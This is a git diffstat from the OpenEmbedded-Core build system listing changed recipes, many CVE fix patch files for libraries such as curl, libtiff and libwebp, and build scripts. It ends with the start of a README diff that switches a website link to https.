-rw-r--r--meta/recipes-multimedia/gstreamer/gst-examples_1.16.0.bb5
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-libav_1.16.3.bb2
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-omx_1.16.3.bb1
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-bad_1.16.3.bb4
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-base/CVE-2021-3522.patch36
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-base_1.16.3.bb6
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2021-3497.patch207
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2021-3498.patch44
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1920.patch59
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1921.patch69
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1922-1923-1924-1925.patch214
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-2122.patch60
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good_1.16.3.bb14
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-ugly_1.16.3.bb4
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-python_1.16.3.bb2
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-rtsp-server_1.16.3.bb2
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-vaapi_1.16.3.bb1
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0/0006-tests-seek-Don-t-use-too-strict-timeout-for-validati.patch33
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0_1.16.3.bb19
-rw-r--r--meta/recipes-multimedia/lame/lame_3.100.bb3
-rw-r--r--meta/recipes-multimedia/liba52/liba52_0.7.4.bb3
-rw-r--r--meta/recipes-multimedia/libid3tag/libid3tag/cflags_filter.patch21
-rw-r--r--meta/recipes-multimedia/libid3tag/libid3tag_0.15.1b.bb1
-rw-r--r--meta/recipes-multimedia/libomxil/libomxil_0.9.3.bb6
-rw-r--r--meta/recipes-multimedia/libpng/files/run-ptest29
-rw-r--r--meta/recipes-multimedia/libpng/libpng_1.6.37.bb18
-rw-r--r--meta/recipes-multimedia/libsamplerate/libsamplerate0/shared_version_info.patch13
-rw-r--r--meta/recipes-multimedia/libsamplerate/libsamplerate0_0.1.9.bb2
-rw-r--r--meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-3246_1.patch36
-rw-r--r--meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-3246_2.patch44
-rw-r--r--meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-4156.patch30
-rw-r--r--meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2022-33065.patch46
-rw-r--r--meta/recipes-multimedia/libsndfile/libsndfile1_1.0.28.bb9
-rw-r--r--meta/recipes-multimedia/libtiff/files/0001-tiffset-fix-global-buffer-overflow-for-ASCII-tags-wh.patch52
-rw-r--r--meta/recipes-multimedia/libtiff/files/001_support_patch_for_CVE-2020-35521_and_CVE-2020-35522.patch148
-rw-r--r--meta/recipes-multimedia/libtiff/files/002_support_patch_for_CVE-2020-35521_and_CVE-2020-35522.patch27
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2020-35521_and_CVE-2020-35522.patch119
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2020-35523.patch55
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2020-35524-1.patch42
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2020-35524-2.patch36
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-0865.patch39
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-0891.patch217
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-0907.patch94
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-0908.patch34
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-0909.patch37
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-0924.patch58
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-2056-CVE-2022-2057-CVE-2022-2058.patch183
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-2867-CVE-2022-2868-CVE-2022-2869.patch159
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-34526.patch29
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-3570_3598.patch659
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-3597_3626_3627.patch123
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-3599.patch277
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-3970.patch45
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-40090.patch548
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-48281.patch26
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-0795_0796_0797_0798_0799.patch157
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-0800_0801_0802_0803_0804.patch135
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-1916.patch91
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-25433.patch173
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-25434-CVE-2023-25435.patch94
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-26965.patch90
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-26966.patch35
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-2908.patch33
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-3316.patch59
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-3576.patch35
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-3618.patch47
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-40745.patch34
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-41175.patch67
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-52356.patch53
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-6228.patch30
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-6277-1.patch191
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-6277-2.patch152
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-6277-3.patch46
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-6277-4.patch94
-rw-r--r--meta/recipes-multimedia/libtiff/tiff/561599c99f987dc32ae110370cfdd7df7975586b.patch28
-rw-r--r--meta/recipes-multimedia/libtiff/tiff/CVE-2022-1354.patch212
-rw-r--r--meta/recipes-multimedia/libtiff/tiff/CVE-2022-1355.patch62
-rw-r--r--meta/recipes-multimedia/libtiff/tiff/eecb0712f4c3a5b449f70c57988260a667ddbdef.patch30
-rw-r--r--meta/recipes-multimedia/libtiff/tiff_4.1.0.bb53
-rw-r--r--meta/recipes-multimedia/mpeg2dec/mpeg2dec_0.5.1.bb6
-rw-r--r--meta/recipes-multimedia/pulseaudio/pulseaudio.inc7
-rw-r--r--meta/recipes-multimedia/speex/speex/CVE-2020-23903.patch30
-rw-r--r--meta/recipes-multimedia/speex/speex_1.2.0.bb4
-rw-r--r--meta/recipes-multimedia/webp/files/CVE-2023-1999.patch55
-rw-r--r--meta/recipes-multimedia/webp/files/CVE-2023-4863-0001.patch366
-rw-r--r--meta/recipes-multimedia/webp/files/CVE-2023-4863-0002.patch53
-rw-r--r--meta/recipes-multimedia/webp/libwebp_1.1.0.bb6
-rw-r--r--meta/recipes-multimedia/x264/x264_git.bb2
-rw-r--r--meta/recipes-rt/rt-tests/rt-tests.inc2
-rw-r--r--meta/recipes-rt/rt-tests/rt-tests_1.1.bb3
-rw-r--r--meta/recipes-sato/images/core-image-sato-dev.bb1
-rw-r--r--meta/recipes-sato/images/core-image-sato-ptest-fast.bb4
-rw-r--r--meta/recipes-sato/images/core-image-sato-sdk-ptest.bb4
-rw-r--r--meta/recipes-sato/images/core-image-sato-sdk.bb1
-rw-r--r--meta/recipes-sato/images/core-image-sato.bb2
-rw-r--r--meta/recipes-sato/l3afpad/l3afpad_git.bb6
-rw-r--r--meta/recipes-sato/matchbox-config-gtk/matchbox-config-gtk_0.2.bb2
-rw-r--r--meta/recipes-sato/matchbox-desktop/matchbox-desktop_2.2.bb3
-rw-r--r--meta/recipes-sato/matchbox-keyboard/matchbox-keyboard_0.1.1.bb1
-rw-r--r--meta/recipes-sato/matchbox-panel-2/matchbox-panel-2_2.11.bb4
-rw-r--r--meta/recipes-sato/matchbox-terminal/matchbox-terminal_0.2.bb2
-rw-r--r--meta/recipes-sato/matchbox-theme-sato/matchbox-theme-sato_0.2.bb2
-rw-r--r--meta/recipes-sato/packagegroups/packagegroup-core-x11-sato.bb2
-rw-r--r--meta/recipes-sato/pcmanfm/pcmanfm_1.3.1.bb1
-rw-r--r--meta/recipes-sato/puzzles/puzzles_git.bb3
-rw-r--r--meta/recipes-sato/rxvt-unicode/rxvt-unicode.inc1
-rw-r--r--meta/recipes-sato/rxvt-unicode/rxvt-unicode/0001-libev-remove-deprecated-throw-specification.patch30
-rw-r--r--meta/recipes-sato/rxvt-unicode/rxvt-unicode_9.22.bb4
-rw-r--r--meta/recipes-sato/sato-screenshot/sato-screenshot_0.3.bb2
-rw-r--r--meta/recipes-sato/settings-daemon/settings-daemon_0.0.2.bb2
-rw-r--r--meta/recipes-sato/webkit/webkitgtk/0001-MiniBrowser-Fix-reproduciblity.patch31
-rw-r--r--meta/recipes-sato/webkit/webkitgtk/0001-clang-11-fix-build-errors-due-to-WWc-11-narrowing.patch66
-rw-r--r--meta/recipes-sato/webkit/webkitgtk/CVE-2020-13753.patch15
-rw-r--r--meta/recipes-sato/webkit/webkitgtk_2.28.4.bb (renamed from meta/recipes-sato/webkit/webkitgtk_2.28.2.bb)18
-rw-r--r--meta/recipes-sato/webkit/wpebackend-fdo_1.4.1.bb3
-rw-r--r--meta/recipes-support/apr/apr-util/0001-Fix-error-handling-in-gdbm.patch135
-rw-r--r--meta/recipes-support/apr/apr-util_1.6.3.bb (renamed from meta/recipes-support/apr/apr-util_1.6.1.bb)13
-rw-r--r--meta/recipes-support/apr/apr/0001-Add-option-to-disable-timed-dependant-tests.patch20
-rw-r--r--meta/recipes-support/apr/apr/0001-configure-Remove-runtime-test-for-mmap-that-can-map-.patch58
-rw-r--r--meta/recipes-support/apr/apr/0002-apr-Remove-workdir-path-references-from-installed-ap.patch25
-rw-r--r--meta/recipes-support/apr/apr/0003-Makefile.in-configure.in-support-cross-compiling.patch63
-rw-r--r--meta/recipes-support/apr/apr/0006-apr-fix-off_t-size-doesn-t-match-in-glibc-when-cross.patch76
-rw-r--r--meta/recipes-support/apr/apr/libtoolize_check.patch21
-rw-r--r--meta/recipes-support/apr/apr_1.7.2.bb (renamed from meta/recipes-support/apr/apr_1.7.0.bb)27
-rw-r--r--meta/recipes-support/argp-standalone/argp-standalone_1.3.bb1
-rw-r--r--meta/recipes-support/aspell/aspell_0.60.8.bb13
-rw-r--r--meta/recipes-support/aspell/files/CVE-2019-25051.patch101
-rw-r--r--meta/recipes-support/atk/at-spi2-atk_2.34.1.bb2
-rw-r--r--meta/recipes-support/atk/at-spi2-core_2.34.0.bb4
-rw-r--r--meta/recipes-support/atk/atk_2.34.1.bb1
-rw-r--r--meta/recipes-support/attr/acl_2.2.53.bb5
-rw-r--r--meta/recipes-support/attr/attr.inc2
-rw-r--r--meta/recipes-support/bash-completion/bash-completion_2.10.bb5
-rw-r--r--meta/recipes-support/bmap-tools/bmap-tools_3.5.bb4
-rw-r--r--meta/recipes-support/boost/boost-1.72.0.inc2
-rw-r--r--meta/recipes-support/boost/boost.inc6
-rw-r--r--meta/recipes-support/boost/boost/0001-Fix-Wsign-compare-warning-with-glibc-2.34-on-Linux-p.patch32
-rw-r--r--meta/recipes-support/boost/boost/0001-Revert-change-to-elide-a-warning-that-caused-Solaris.patch24
-rw-r--r--meta/recipes-support/boost/boost/arm-intrinsics.patch55
-rw-r--r--meta/recipes-support/boost/boost_1.72.0.bb4
-rw-r--r--meta/recipes-support/ca-certificates/ca-certificates/0001-Revert-mozilla-certdata2pem.py-print-a-warning-for-e.patch80
-rw-r--r--meta/recipes-support/ca-certificates/ca-certificates/0001-certdata2pem.py-use-python3.patch37
-rw-r--r--meta/recipes-support/ca-certificates/ca-certificates/sbindir.patch20
-rw-r--r--meta/recipes-support/ca-certificates/ca-certificates/update-ca-certificates-support-Toybox.patch34
-rw-r--r--meta/recipes-support/ca-certificates/ca-certificates_20211016.bb (renamed from meta/recipes-support/ca-certificates/ca-certificates_20190110.bb)17
-rw-r--r--meta/recipes-support/consolekit/consolekit_0.4.6.bb2
-rw-r--r--meta/recipes-support/curl/curl/CVE-2020-8231.patch1092
-rw-r--r--meta/recipes-support/curl/curl/CVE-2020-8284.patch209
-rw-r--r--meta/recipes-support/curl/curl/CVE-2020-8285.patch260
-rw-r--r--meta/recipes-support/curl/curl/CVE-2020-8286.patch133
-rw-r--r--meta/recipes-support/curl/curl/CVE-2021-22876.patch59
-rw-r--r--meta/recipes-support/curl/curl/CVE-2021-22890.patch464
-rw-r--r--meta/recipes-support/curl/curl/CVE-2021-22898.patch26
-rw-r--r--meta/recipes-support/curl/curl/CVE-2021-22924.patch226
-rw-r--r--meta/recipes-support/curl/curl/CVE-2021-22925.patch43
-rw-r--r--meta/recipes-support/curl/curl/CVE-2021-22946-pre1.patch86
-rw-r--r--meta/recipes-support/curl/curl/CVE-2021-22946.patch328
-rw-r--r--meta/recipes-support/curl/curl/CVE-2021-22947.patch352
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-22576.patch148
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-27774-1.patch45
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-27774-2.patch80
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-27774-3.patch83
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-27774-4.patch35
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-27775.patch39
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-27776.patch114
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-27781.patch46
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-27782-1.patch363
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-27782-2.patch71
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-32206.patch52
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-32207.patch284
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-32208.patch72
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-32221.patch29
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-35252.patch72
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-35260.patch68
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-43552.patch82
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-23916.patch231
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-27533.patch59
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-27534-pre1.patch51
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-27534.patch33
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-27535-pre1.patch236
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-27535.patch170
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-27536.patch55
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-27538.patch31
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-28320-fol1.patch197
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-28320.patch86
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-28321.patch272
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-28322.patch380
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-32001.patch38
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-38545.patch148
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-38546.patch132
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-46218.patch52
-rw-r--r--meta/recipes-support/curl/curl/CVE-2024-2398.patch88
-rw-r--r--meta/recipes-support/curl/curl_7.69.1.bb59
-rw-r--r--meta/recipes-support/db/db_5.3.28.bb3
-rw-r--r--meta/recipes-support/debianutils/debianutils_4.9.1.bb5
-rw-r--r--meta/recipes-support/diffoscope/diffoscope_172.bb (renamed from meta/recipes-support/diffoscope/diffoscope_136.bb)11
-rw-r--r--meta/recipes-support/dos2unix/dos2unix_7.4.1.bb2
-rw-r--r--meta/recipes-support/enchant/enchant2_2.2.8.bb3
-rw-r--r--meta/recipes-support/fribidi/fribidi/CVE-2022-25308.patch50
-rw-r--r--meta/recipes-support/fribidi/fribidi/CVE-2022-25309.patch31
-rw-r--r--meta/recipes-support/fribidi/fribidi/CVE-2022-25310.patch30
-rw-r--r--meta/recipes-support/fribidi/fribidi_1.0.9.bb9
-rw-r--r--meta/recipes-support/gdbm/gdbm_1.18.1.bb3
-rw-r--r--meta/recipes-support/gmp/gmp/cve-2021-43618.patch27
-rw-r--r--meta/recipes-support/gmp/gmp_6.2.0.bb1
-rw-r--r--meta/recipes-support/gnome-desktop-testing/gnome-desktop-testing_2018.1.bb6
-rw-r--r--meta/recipes-support/gnupg/gnupg/0001-configure.ac-use-a-custom-value-for-the-location-of-.patch6
-rw-r--r--meta/recipes-support/gnupg/gnupg/0003-dirmngr-uses-libgpg-error.patch24
-rw-r--r--meta/recipes-support/gnupg/gnupg/CVE-2022-34903.patch44
-rw-r--r--meta/recipes-support/gnupg/gnupg/relocate.patch20
-rw-r--r--meta/recipes-support/gnupg/gnupg_2.2.27.bb (renamed from meta/recipes-support/gnupg/gnupg_2.2.20.bb)10
-rw-r--r--meta/recipes-support/gnutls/gnutls/CVE-2021-20231.patch67
-rw-r--r--meta/recipes-support/gnutls/gnutls/CVE-2021-20232.patch65
-rw-r--r--meta/recipes-support/gnutls/gnutls/CVE-2021-4209.patch37
-rw-r--r--meta/recipes-support/gnutls/gnutls/CVE-2022-2509.patch282
-rw-r--r--meta/recipes-support/gnutls/gnutls/CVE-2023-0361.patch85
-rw-r--r--meta/recipes-support/gnutls/gnutls/CVE-2023-5981.patch206
-rw-r--r--meta/recipes-support/gnutls/gnutls/CVE-2024-0553.patch125
-rw-r--r--meta/recipes-support/gnutls/gnutls_3.6.14.bb11
-rw-r--r--meta/recipes-support/gnutls/libtasn1/CVE-2021-46848.patch45
-rw-r--r--meta/recipes-support/gnutls/libtasn1_4.16.0.bb3
-rw-r--r--meta/recipes-support/gpgme/gpgme/0001-use-closefrom-on-linux-and-glibc-2.34.patch24
-rw-r--r--meta/recipes-support/gpgme/gpgme_1.13.1.bb5
-rw-r--r--meta/recipes-support/icu/icu/0002-ICU-21175-Add-cnvalias-as-a-dependency-of-misc_res.patch24
-rw-r--r--meta/recipes-support/icu/icu_66.1.bb4
-rw-r--r--meta/recipes-support/iso-codes/iso-codes_4.4.bb5
-rw-r--r--meta/recipes-support/itstool/itstool_2.0.6.bb4
-rw-r--r--meta/recipes-support/libassuan/libassuan_2.5.3.bb3
-rw-r--r--meta/recipes-support/libatomic-ops/libatomic-ops_7.6.10.bb1
-rw-r--r--meta/recipes-support/libbsd/libbsd_0.10.0.bb6
-rw-r--r--meta/recipes-support/libcap/files/CVE-2023-2602.patch52
-rw-r--r--meta/recipes-support/libcap/files/CVE-2023-2603.patch58
-rw-r--r--meta/recipes-support/libcap/libcap_2.32.bb8
-rw-r--r--meta/recipes-support/libcheck/libcheck_0.14.0.bb5
-rw-r--r--meta/recipes-support/libcroco/files/CVE-2020-12825.patch192
-rw-r--r--meta/recipes-support/libcroco/libcroco_0.6.13.bb6
-rw-r--r--meta/recipes-support/libdaemon/libdaemon_0.14.bb4
-rw-r--r--meta/recipes-support/libevdev/libevdev/determinism.patch3
-rw-r--r--meta/recipes-support/libevdev/libevdev_1.8.0.bb3
-rw-r--r--meta/recipes-support/libevent/libevent/0002-test-regress.h-Increase-default-timeval-tolerance-50.patch33
-rw-r--r--meta/recipes-support/libevent/libevent_2.1.11.bb6
-rw-r--r--meta/recipes-support/libexif/files/CVE-2020-0198.patch66
-rw-r--r--meta/recipes-support/libexif/files/CVE-2020-0452.patch39
-rw-r--r--meta/recipes-support/libexif/libexif_0.6.22.bb5
-rw-r--r--meta/recipes-support/libffi/libffi/0001-arm-sysv-reverted-clang-VFP-mitigation.patch104
-rw-r--r--meta/recipes-support/libffi/libffi_3.3.bb1
-rw-r--r--meta/recipes-support/libfm/libfm-extra_1.3.1.bb1
-rw-r--r--meta/recipes-support/libfm/libfm_1.3.1.bb2
-rw-r--r--meta/recipes-support/libgcrypt/files/CVE-2021-33560.patch77
-rw-r--r--meta/recipes-support/libgcrypt/files/CVE-2021-40528.patch109
-rw-r--r--meta/recipes-support/libgcrypt/libgcrypt_1.8.5.bb8
-rw-r--r--meta/recipes-support/libgpg-error/libgpg-error_1.37.bb1
-rw-r--r--meta/recipes-support/libical/libical_3.0.7.bb4
-rw-r--r--meta/recipes-support/libjitterentropy/libjitterentropy_2.2.0.bb2
-rw-r--r--meta/recipes-support/libksba/libksba/CVE-2022-3515.patch47
-rw-r--r--meta/recipes-support/libksba/libksba/CVE-2022-47629.patch69
-rw-r--r--meta/recipes-support/libksba/libksba_1.3.5.bb10
-rw-r--r--meta/recipes-support/libnl/libnl_3.5.0.bb5
-rw-r--r--meta/recipes-support/libpcre/libpcre/fix-pcre-name-collision.patch41
-rw-r--r--meta/recipes-support/libpcre/libpcre2/CVE-2022-1586-regression.patch30
-rw-r--r--meta/recipes-support/libpcre/libpcre2/CVE-2022-1586.patch59
-rw-r--r--meta/recipes-support/libpcre/libpcre2/CVE-2022-1587.patch660
-rw-r--r--meta/recipes-support/libpcre/libpcre2/CVE-2022-41409.patch74
-rw-r--r--meta/recipes-support/libpcre/libpcre2_10.34.bb6
-rw-r--r--meta/recipes-support/libpcre/libpcre_8.44.bb3
-rw-r--r--meta/recipes-support/libproxy/libproxy_0.4.15.bb4
-rw-r--r--meta/recipes-support/libpsl/libpsl_0.21.0.bb13
-rw-r--r--meta/recipes-support/libsoup/libsoup-2.4_2.68.4.bb6
-rw-r--r--meta/recipes-support/libunistring/libunistring_0.9.10.bb1
-rw-r--r--meta/recipes-support/libunwind/libunwind/0001-Fix-compilation-with-fno-common.patch420
-rw-r--r--meta/recipes-support/libunwind/libunwind_1.3.1.bb1
-rw-r--r--meta/recipes-support/liburcu/liburcu_0.11.1.bb3
-rw-r--r--meta/recipes-support/libusb/libusb1_1.0.22.bb6
-rw-r--r--meta/recipes-support/libxslt/libxslt/CVE-2021-30560.patch201
-rw-r--r--meta/recipes-support/libxslt/libxslt_1.1.34.bb10
-rw-r--r--meta/recipes-support/lz4/files/CVE-2021-3520.patch27
-rw-r--r--meta/recipes-support/lz4/lz4_1.9.2.bb10
-rw-r--r--meta/recipes-support/lzo/lzo_2.10.bb4
-rw-r--r--meta/recipes-support/lzop/lzop_1.04.bb1
-rw-r--r--meta/recipes-support/mpfr/mpfr_4.0.2.bb1
-rw-r--r--meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-1.patch215
-rw-r--r--meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-2.patch53
-rw-r--r--meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-3.patch122
-rw-r--r--meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-4.patch48
-rw-r--r--meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-5.patch53
-rw-r--r--meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_1.patch277
-rw-r--r--meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_2.patch163
-rw-r--r--meta/recipes-support/nettle/nettle_3.5.1.bb11
-rw-r--r--meta/recipes-support/npth/npth_1.6.bb1
-rw-r--r--meta/recipes-support/p11-kit/p11-kit_0.23.22.bb (renamed from meta/recipes-support/p11-kit/p11-kit_0.23.20.bb)9
-rw-r--r--meta/recipes-support/popt/popt_1.16.bb1
-rw-r--r--meta/recipes-support/ptest-runner/ptest-runner_2.4.0.bb4
-rw-r--r--meta/recipes-support/re2c/re2c/CVE-2018-21232-1.patch347
-rw-r--r--meta/recipes-support/re2c/re2c/CVE-2018-21232-2.patch243
-rw-r--r--meta/recipes-support/re2c/re2c/CVE-2018-21232-3.patch156
-rw-r--r--meta/recipes-support/re2c/re2c/CVE-2018-21232-4.patch166
-rw-r--r--meta/recipes-support/re2c/re2c_1.0.1.bb10
-rw-r--r--meta/recipes-support/rng-tools/rng-tools/0001-rngd_jitter-fix-O_NONBLOCK-setting-for-entropy-pipe.patch26
-rw-r--r--meta/recipes-support/rng-tools/rng-tools/0002-rngd_jitter-initialize-AES-key-before-setting-the-en.patch38
-rw-r--r--meta/recipes-support/rng-tools/rng-tools/0003-rngd_jitter-always-read-from-entropy-pipe-before-set.patch38
-rw-r--r--meta/recipes-support/rng-tools/rng-tools/rngd.service1
-rw-r--r--meta/recipes-support/rng-tools/rng-tools_6.9.bb5
-rw-r--r--meta/recipes-support/serf/serf_1.3.9.bb10
-rw-r--r--meta/recipes-support/shared-mime-info/shared-mime-info_git.bb3
-rw-r--r--meta/recipes-support/sqlite/files/CVE-2020-35525.patch21
-rw-r--r--meta/recipes-support/sqlite/files/CVE-2020-35527.patch22
-rw-r--r--meta/recipes-support/sqlite/files/CVE-2021-20223.patch23
-rw-r--r--meta/recipes-support/sqlite/files/CVE-2022-35737.patch29
-rw-r--r--meta/recipes-support/sqlite/files/CVE-2023-7104.patch46
-rw-r--r--meta/recipes-support/sqlite/sqlite3.inc1
-rw-r--r--meta/recipes-support/sqlite/sqlite3_3.31.1.bb7
-rw-r--r--meta/recipes-support/taglib/taglib_1.11.1.bb1
-rw-r--r--meta/recipes-support/vim/files/0001-src-Makefile-improve-reproducibility.patch13
-rw-r--r--meta/recipes-support/vim/files/disable_acl_header_check.patch15
-rw-r--r--meta/recipes-support/vim/files/no-path-adjust.patch8
-rw-r--r--meta/recipes-support/vim/files/vim-add-knob-whether-elf.h-are-checked.patch13
-rw-r--r--meta/recipes-support/vim/vim-tiny_9.0.bb (renamed from meta/recipes-support/vim/vim-tiny_8.2.bb)0
-rw-r--r--meta/recipes-support/vim/vim.inc49
-rw-r--r--meta/recipes-support/vim/vim_9.0.bb (renamed from meta/recipes-support/vim/vim_8.2.bb)0
-rw-r--r--meta/recipes-support/vte/vte_0.58.3.bb2
-rwxr-xr-xscripts/bitbake-whatchanged2
-rwxr-xr-xscripts/buildhistory-diff5
-rwxr-xr-xscripts/contrib/build-perf-test-wrapper.sh15
-rwxr-xr-xscripts/contrib/convert-srcuri.py77
-rwxr-xr-xscripts/contrib/documentation-audit.sh2
-rwxr-xr-xscripts/contrib/oe-build-perf-report-email.py167
-rwxr-xr-xscripts/create-pull-request2
-rwxr-xr-xscripts/git26
-rw-r--r--scripts/lib/buildstats.py4
-rw-r--r--scripts/lib/checklayer/__init__.py11
-rw-r--r--scripts/lib/checklayer/cases/common.py2
-rw-r--r--scripts/lib/devtool/deploy.py12
-rw-r--r--scripts/lib/devtool/menuconfig.py2
-rw-r--r--scripts/lib/devtool/standard.py46
-rw-r--r--scripts/lib/recipetool/create.py18
-rw-r--r--scripts/lib/resulttool/report.py5
-rw-r--r--scripts/lib/resulttool/resultutils.py8
-rw-r--r--scripts/lib/scriptutils.py10
-rw-r--r--scripts/lib/wic/engine.py6
-rw-r--r--scripts/lib/wic/help.py10
-rw-r--r--scripts/lib/wic/ksparser.py18
-rw-r--r--scripts/lib/wic/misc.py24
-rw-r--r--scripts/lib/wic/partition.py106
-rw-r--r--scripts/lib/wic/pluginbase.py8
-rw-r--r--scripts/lib/wic/plugins/imager/direct.py57
-rw-r--r--scripts/lib/wic/plugins/source/bootimg-efi.py7
-rw-r--r--scripts/lib/wic/plugins/source/bootimg-partition.py2
-rw-r--r--scripts/lib/wic/plugins/source/bootimg-pcbios.py6
-rw-r--r--scripts/lib/wic/plugins/source/rootfs.py85
-rwxr-xr-xscripts/nativesdk-intercept/chgrp27
-rwxr-xr-xscripts/nativesdk-intercept/chown27
-rwxr-xr-xscripts/oe-depends-dot21
-rwxr-xr-xscripts/oe-pkgdata-browser2
-rwxr-xr-xscripts/oe-pkgdata-util3
-rwxr-xr-xscripts/oe-run-native2
-rwxr-xr-xscripts/oe-setup-builddir4
-rw-r--r--scripts/postinst-intercepts/update_font_cache2
-rw-r--r--scripts/pybootchartgui/pybootchartgui/draw.py7
-rw-r--r--scripts/pybootchartgui/pybootchartgui/parsing.py2
-rwxr-xr-xscripts/relocate_sdk.py10
-rwxr-xr-xscripts/runqemu55
-rwxr-xr-xscripts/verify-bashisms2
-rwxr-xr-xscripts/wic8
-rwxr-xr-xscripts/yocto-check-layer28
1731 files changed, 124431 insertions, 6956 deletions
diff --git a/README.OE-Core b/README.OE-Core
index 521916cd4f..2f2127fb03 100644
--- a/README.OE-Core
+++ b/README.OE-Core
@@ -6,24 +6,24 @@ of OpenEmbedded. It is distro-less (can build a functional image with
DISTRO = "nodistro") and contains only emulated machine support.
For information about OpenEmbedded, see the OpenEmbedded website:
- http://www.openembedded.org/
+ https://www.openembedded.org/
